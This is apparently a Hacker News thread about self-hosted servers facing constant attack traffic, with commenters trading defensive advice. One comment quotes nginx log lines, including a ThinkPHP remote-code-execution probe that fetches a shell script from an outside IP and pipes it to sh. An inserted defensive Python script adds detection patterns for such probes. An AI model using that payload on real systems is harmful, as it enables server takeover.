253 points akyuu | 32 comments
1. embedding-shape ◴[] No.45945999[source]
> The internet is no longer a safe haven for software hobbyists

Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs"). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss off some organization and (I'm assuming) they hire some bad actor to try to make you offline.

Dealing with crawlers, bot nets, automation gone wrong, pissed off humans and so on has been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? Hosted stuff across a wide range of providers, and it seems to happen across all of them.

replies(13): >>45946074 #>>45946178 #>>45946504 #>>45946700 #>>45946715 #>>45946870 #>>45946927 #>>45947354 #>>45947815 #>>45950210 #>>45950360 #>>45951545 #>>45955317 #
2. zwnow ◴[] No.45946074[source]
My first ever deployed project was breached on day 1 with my database dropped and a ransom note in there. Was a beginner mistake by me that allowed this, but it's pretty discouraging. It's not the internet that sucks, it's people that suck.
replies(1): >>45946161 #
3. mattmaroon ◴[] No.45946161[source]
Well I guess at least on day 1 you didn’t have much to lose!
replies(2): >>45946426 #>>45947142 #
4. aftbit ◴[] No.45946178[source]
My stuff used to get popped daily. A janky PHP guestbook I wrote just to learn back in the early 2000s? No HTML injection protection & someone turned my site into a spammy XSS hack within days. A WordPress installation I fell behind on patching? Turned into SEO spam in hours. A redis instance I was using just to learn some of their data structures that got accidentally exposed to the web? Used to root my computer and install a botnet RAT. This was all before 2020.

I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used star-certs to avoid being in the cert logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.

If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or Tiktok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.

replies(4): >>45946266 #>>45946362 #>>45947377 #>>45949482 #
5. Forgeties79 ◴[] No.45946266[source]
I really like how you take these situations and turn them into learning moments, but ultimately what you’re describing still sounds like an incredibly hostile space. Like yeah everyone should be a defensive driver on the road, but we still acknowledge that other people need to follow the rules instead of forcing us to be defensive drivers all the time.
6. zelphirkalt ◴[] No.45946362[source]
Hosting a WP with any number of third-party plugins written by script kiddies, without constant vigilance and keeping things up to date, is a recipe for disaster. This makes it a job guarantee. Hapless people paying for someone to set up a hopelessly over-complicated WP setup, paying for lots of plugins, and constant upkeep. Basically, that ecosystem feeds an entire community of "web developers" by pushing badly written software, that then endlessly needs to be patched and maintained. Then the feature creep sets in and plugins stray from the path of doing one thing well, until even WP instance maintainers deem them too bloated and look for a simpler one. Then the cycle begins anew.
7. zwnow ◴[] No.45946426{3}[source]
It's a personal blog so even if data was lost it would've been just posts that nobody reads. Certainly not worth the 0.00054 BTC they wanted.
8. heresie-dabord ◴[] No.45946504[source]
> my servers have always been attacked

I believe the correct verb is monetised.

9. BinaryIgor ◴[] No.45946700[source]
I have very similar experience. In my Nginx logs, I see things like that on a regular basis:

79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

...

145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-"

145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"

or:

192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"

These are just some examples, but they happen pretty much daily :(

10. hdgvhicv ◴[] No.45946715[source]
I remember watching the code red signatures in my space logs on my desktop back in 2001
11. NoboruWataya ◴[] No.45946870[source]
I have a personal domain that I have no reason to believe any other human visits. I selfhost a few services that only I use but that I expose to the internet so I can access them from anywhere conveniently and without having to expose my home network. Still I get a constant torrent of malicious traffic, just bots trying to exploit known vulnerabilities (loads of them are clearly targeting WordPress, for example, even though I have never used WordPress). And it has been that way for years. I remember the first time I read my access logs I had a heart attack, but it's just the way it is.
replies(4): >>45947135 #>>45947452 #>>45947801 #>>45949802 #
12. UltraSane ◴[] No.45946927[source]
The public internet is an incredibly hostile infosec environment and you pretty much HAVE to block requests based on real time threat data like https://www.misp-project.org/feeds/

It is fun to create honeypots for things like SSH and RDP and automatically block the source IPs

13. timeinput ◴[] No.45947135[source]
and it has been that way for a long time. Hosting a service on the internet means someone is *constantly* knocking at your door. It would be unimaginable if every few 10-1000s of milliseconds someone was trying a key in my front door, but that's just what it is with an open port on the internet.
replies(1): >>45947257 #
14. timeinput ◴[] No.45947142{3}[source]
more like a zero day on day zero.
15. sshine ◴[] No.45947257{3}[source]
I recently provisioned a VPS for educational purposes. As part of teaching public/private network interfaces in Docker, and as a debug tool, I run netstat pretty easily on.

Minutes after coming into existence, I have half a dozen connections to sshd from Chinese IP addresses.

That teaches the use of SSH keys.

replies(2): >>45948165 #>>45948789 #
16. fragmede ◴[] No.45947354[source]
The Internet is not safe, and Let's Encrypt shows us this. They're a great service, but the moment you put something on the Internet and then give it an SSL/TLS certificate, evil will hammer your site trying to find a WordPress admin page.
17. fragmede ◴[] No.45947377[source]
The worst feeling I ever had was from exposing a samba share to the Internet in the 2000s and having that get popped and my dad’s company getting hacked because of the service I set up for him.
18. mbreese ◴[] No.45947452[source]
I’ve often thought about writing a script to use those bot attacks as a bit of a honey pot. The idea would be if someone is viewing a site with a brand new SSL certificate, that it can’t be legitimate traffic, so just block that ip/subnet outright at the firewall. Especially if they are looking for specific URLs like Wordpress installations. There are a few good actors that also hit sites quickly (ex: I’ve seen Bing indexing in that first wave of hits), but those are the exception.

Sadly, like many people, I just deal with the traffic as opposed to getting around to actually writing a tool to block it.

replies(1): >>45948772 #
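As an added example (not code from this thread or from any commenter), here is a small defender-side triage script in the spirit of comments 9 and 18: it parses nginx combined-format lines, tags the probe signatures quoted above (the XDEBUG trigger, the ThinkPHP invokefunction chain, WordPress paths, a TLS ClientHello sent to the plaintext port), skips allow-listed crawler user agents, and returns the per-IP block candidates a firewall rule could consume. The sample log lines, tag names, allow-list and threshold are all constructed here.

```python
import re
from collections import defaultdict

# Constructed sample nginx "combined" log lines modelled on the probes quoted above (documentation IPs).
SAMPLE_LOG = r"""
203.0.113.10 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "-" "Mozilla/5.0"
203.0.113.10 - - [16/Nov/2025:17:04:53 +0000] "GET /wp-login.php HTTP/1.1" 404 555 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2Fexample.invalid%2Fx.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03" 400 157 "-" "-"
192.0.2.44 - - [16/Nov/2025:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.44 - - [16/Nov/2025:12:00:01 +0000] "GET /wp-admin/ HTTP/1.1" 404 555 "-" "Mozilla/5.0 (compatible; bingbot/2.0)"
"""

# Combined format; nginx escapes quotes inside the request as \x22, so [^"]* also copes with raw-TLS junk.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Signatures of the probes seen in the thread (tag names are hypothetical).
PROBE_PATTERNS = [
    ("xdebug-trigger", re.compile(r"XDEBUG_SESSION_START=", re.I)),
    ("thinkphp-invokefunction", re.compile(r"invokefunction.*call_user_func_array", re.I)),
    ("wordpress-path", re.compile(r"/wp-(login\.php|admin)", re.I)),
    ("shell-download-chain", re.compile(r"(wget|curl)%20", re.I)),
]

def classify(line):
    m = LINE_RE.match(line)
    if not m:
        return None  # not a combined-format line
    req = m.group("request")
    tags = [name for name, pat in PROBE_PATTERNS if pat.search(req)]
    # A TLS ClientHello (0x16 0x03 ...) hitting the plaintext port is logged escaped and answered with 400.
    if req.startswith(r"\x16\x03") and m.group("status") == "400":
        tags.append("tls-on-plaintext-port")
    return {"ip": m.group("ip"), "status": int(m.group("status")), "ua": m.group("ua"), "tags": tags}

def score_sources(lines, allow_ua=("bingbot", "Googlebot")):
    """Probe tags per source IP; allow-listed crawler UAs are skipped (confirm them via rDNS, the UA is spoofable)."""
    hits = defaultdict(list)
    for line in lines:
        rec = classify(line)
        if rec and rec["tags"] and not any(t in rec["ua"] for t in allow_ua):
            hits[rec["ip"]].extend(rec["tags"])
    return dict(hits)

def block_candidates(lines, threshold=2):
    """IPs with at least `threshold` probe hits: the list a firewall rule would consume."""
    return sorted(ip for ip, tags in score_sources(lines).items() if len(tags) >= threshold)
```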
19. aledalgrande ◴[] No.45947801[source]
For your use case have you thought about VPN into your local network, via e.g. a Synology box? It's pretty cool and easy to set up.
20. _the_inflator ◴[] No.45947815[source]
I can confirm.

My then PageRank 6 business website got attacked non stop starting around 2008.

At this time my log files exploded as well: the Script Kiddies entered the arena.

At the time the first tools leaked into the public to scan for IP ranges and check websites for certain attack vectors.

I miss the era between Compuserve, AOL around 1995 till 2008.

Web Rings, Technorati, fantastic Fan Sites before Wikipedia - wholesome.

Term: Script Kiddies https://en.wikipedia.org/wiki/Script_kiddie

replies(1): >>45948793 #
21. toyg ◴[] No.45948165{4}[source]
Just put sshd on a nonstandard port, and 95% of the traffic goes away. Vandals can't be bothered with port-scanning, probably because the risk of getting banned before the scan is even complete is too high.

But I agree that keys are not optional anymore.

replies(1): >>45974032 #
22. esseph ◴[] No.45948772{3}[source]
You'd end up blocking a bunch of cloud provider IP ranges and one day in the near future, there's a good chance some SaaS or provider service doesn't work.
23. esseph ◴[] No.45948789{4}[source]
Fronting with ssh is not as secure as you could be.

Wireguard, Tailscale, etc. instead, THEN use ssh keys (with a password on them mind you, then you have 2fa - something you have, and something you know).

24. esseph ◴[] No.45948793[source]
By 1995 most of the script kiddies I knew were also co-mingling with 0day authors and warez distributors.
25. Dylan16807 ◴[] No.45949482[source]
It's "not unsafe" if you take dozens of ever changing and hard to learn precautions and also get lucky that new exploits and your exposed services don't overlap? That's the internet being very unsafe.

> If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it.

Personal actions (and their safety) are a different category from environments (and their safety).

26. phs318u ◴[] No.45949802[source]
This sounds like a great use-case for VPN or Tailscale? Access from anywhere, uses the open-internet as a carriage service but exposes no endpoints on the open internet. Is there a particular requirement that makes that non-viable?
replies(1): >>45955941 #
27. masswerk ◴[] No.45950210[source]
To entertain the few humans behind this, I run what I call "HTTP Adventure" on well-known admin addresses.

E.g., https://www.masswerk.at/wp-admin

28. tasn ◴[] No.45950360[source]
Maybe I don't monitor my side projects/personal servers enough, but I've never noticed anything of the sort.

I mean, I do see crawler and bot traffic, but nothing that warrants taking action.

29. port11 ◴[] No.45951545[source]
Yeah, was it ever safe or is this nostalgia? The few times I've managed servers directly I'd get hit a few hundred times per day in a number of obvious, non-existent URLs or existing URLs but with invalid payloads. Using Cloudflare to block entire countries helped a little bit.
30. 1vuio0pswjnm7 ◴[] No.45955317[source]
"Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs")."

I have accessed websites that do not use ICANN DNS nor TLS, sometimes on ports other than common ones like 80, 443, etc.

The term "website" to me means an IP address from which an operator publishes hypertext (HTML) and responds to HTTP requests

But others might define "website" differently

On my home network, for experimentation, I create my own TLDs in a custom root.zone and use non-TLS per-packet encryption to serve HTML over UDP instead of TCP

The blog post refers to "safe haven"

Usually "safe haven" means there is something that one is seeking protection from

It is not clear from the blog post what the author believes "the internet" was previously a safe haven from

Not to mention the www != the internet

It's possible the broader internet, including many "unused" ports between 0-65536, could be a "safe haven" from the web what with "AI bots"

31. NoboruWataya ◴[] No.45955941{3}[source]
I am vaguely aware of such solutions and I think there's no real reason why they wouldn't work. I think I just wasn't familiar with them at the time I set up the VPS. (Also I assume they would require an always-on box at home, which at the time I didn't have, and even now I suspect a VPS would provide more reliable uptime.)
32. sshine ◴[] No.45974032{5}[source]
I do use non-standard ports and sshd on VPC/VPN interfaces. But for teaching purposes, you are dealt a hand and you have to learn to deal with it.